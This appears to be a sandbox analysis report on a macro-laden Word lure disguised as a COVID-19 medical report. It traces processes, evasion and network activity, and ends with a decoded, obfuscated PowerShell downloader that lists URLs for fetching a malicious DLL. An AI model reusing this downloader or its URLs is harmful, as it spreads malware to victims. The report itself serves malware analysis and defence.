Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Giyrh\
Source: C:\Windows\SysWOW64\rundll32.exe | File deleted: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FF00272E05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E1F1
Source: XP-9743 Medical report COVID-19.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Kyl0l3rqw280c6ssa, Function Document_open
Source: XP-9743 Medical report COVID-19.doc | OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.evad.winDOC@26/7@2/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp
Source: XP-9743 Medical report COVID-19.doc | OLE indicator, Word Document stream: true
Source: XP-9743 Medical report COVID-19.doc | OLE document summary: title field not present or empty
Source: XP-9743 Medical report COVID-19.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: XP-9743 Medical report COVID-19.doc | Virustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.doc | ReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: XP-9743 Medical report COVID-19.doc Initial sample: OLE summary subject = Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: XP-9743 Medical report COVID-19.doc Stream path 'Macros/VBA/Gx8fznt8p0b' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gx8fznt8p0b
Document contains an embedded VBA with many randomly named variables
Source: XP-9743 Medical report COVID-19.doc Stream path 'Macros/VBA/Gx8fznt8p0b' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command omitted]
Source: S93E.dll.5.dr Static PE information: real checksum: 0x60901 should be: 0x5c940
Source: S93E.dll.5.dr Static PE information: section name: .text4
Source: S93E.dll.5.dr Static PE information: section name: .text5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001698 push ebp; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001113 push esp; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00184BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001823D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0015E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0014388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00143A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00143272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00144BAB push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001423D7 push cs; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0019E8D0 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0018388E push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00183A42 push ebx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00183272 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00184BAB push ebp; iretd

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Giyrh\pugu.vsm

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Giyrh\pugu.vsm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ipdtn\rmgx.ktd:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fmtjatw\czosow.gcn:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 71.72.196.159 80
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
